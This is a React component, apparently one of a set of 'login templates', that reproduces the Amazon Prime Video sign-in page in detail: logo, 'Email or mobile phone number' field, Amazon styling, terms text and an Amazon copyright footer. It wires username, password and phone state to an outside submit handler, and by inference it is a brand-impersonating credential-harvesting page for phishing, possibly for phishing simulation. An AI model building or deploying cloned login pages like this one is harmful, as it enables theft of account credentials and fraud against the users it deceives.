import React from 'react';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { ChevronDown } from 'lucide-react';
import { LoginTemplate } from '@/lib/loginTemplates/types';

interface PrimeTemplateProps {
  template: LoginTemplate;
  username: string;
  setUsername: (value: string) => void;
  password: string;
  setPassword: (value: string) => void;
  phoneNumber: string;
  setPhoneNumber: (value: string) => void;
  handleSubmit: (e: React.FormEvent) => void;
  isLoading: boolean;
  showPhoneField: boolean;
  navigateToSignup: (id: string) => void;
}

const PrimeTemplate: React.FC<PrimeTemplateProps> = ({
  template,
  username,
  setUsername,
  handleSubmit,
  isLoading,
  navigateToSignup,
}) => {
  const [showNeedHelp, setShowNeedHelp] = React.useState(false);

  return (
    <div className="flex flex-col items-center justify-center min-h-screen w-full bg-white px-4">
      <img 
        src={template.logoUrl} 
        alt="Amazon Prime Video" 
        className="h-8 mb-8"
      />
      
      <div className="w-full max-w-[350px] bg-white rounded-lg border border-gray-300 p-6">
        <h1 className="text-[28px] mb-4 font-normal">Sign in</h1>
        
        <form onSubmit={handleSubmit} className="space-y-4">
          <div className="space-y-2">
            <label className="block text-sm font-bold">
              Email or mobile phone number
            </label>
            <Input
              type="text"
              value={username}
              onChange={(e) => setUsername(e.target.value)}
              className="h-8 border-gray-500 focus:border-[#00A8E1] focus:ring-[#00A8E1]"
              required
            />
          </div>

          <Button
            type="submit"
            className="w-full bg-[#FFD814] hover:bg-[#F7CA00] text-black font-normal text-sm h-8 rounded"
            disabled={isLoading}
          >
            Continue
          </Button>

          <p className="text-xs">
            By continuing, you agree to the Amazon{' '}
            <a href="#" className="text-[#0066c0] hover:text-[#c45500] hover:underline">
              Conditions of Use and Privacy Notice
            </a>.
          </p>

          <button
            type="button"
            onClick={() => setShowNeedHelp(!showNeedHelp)}
            className="flex items-center text-[#0066c0] hover:text-[#c45500] hover:underline text-sm"
          >
            <ChevronDown className={`h-4 w-4 transition-transform ${showNeedHelp ? 'rotate-180' : ''}`} />
            Need help?
          </button>
        </form>
      </div>

      <div className="mt-8 w-full max-w-[350px] text-center">
        <div className="relative">
          <div className="absolute inset-0 flex items-center">
            <div className="w-full border-t border-gray-300"></div>
          </div>
          <div className="relative flex justify-center text-xs uppercase">
            <span className="bg-white px-2 text-gray-500">New to Amazon?</span>
          </div>
        </div>

        <button
          onClick={() => navigateToSignup(template.id)}
          className="mt-4 w-full h-8 bg-[#fff] hover:bg-gray-100 text-sm border border-gray-300 shadow-sm rounded"
        >
          Create your Amazon account
        </button>
      </div>

      <footer className="mt-8 text-xs text-center space-y-4">
        <div className="flex justify-center space-x-8 text-[#0066c0]">
          <a href="#" className="hover:text-[#c45500] hover:underline">Terms and Privacy Notice</a>
          <a href="#" className="hover:text-[#c45500] hover:underline">Send us feedback</a>
          <a href="#" className="hover:text-[#c45500] hover:underline">Help</a>
        </div>
        <p className="text-gray-600">© 1996-2025, Amazon.com, Inc. or its affiliates</p>
      </footer>
    </div>
  );
};

export default PrimeTemplate;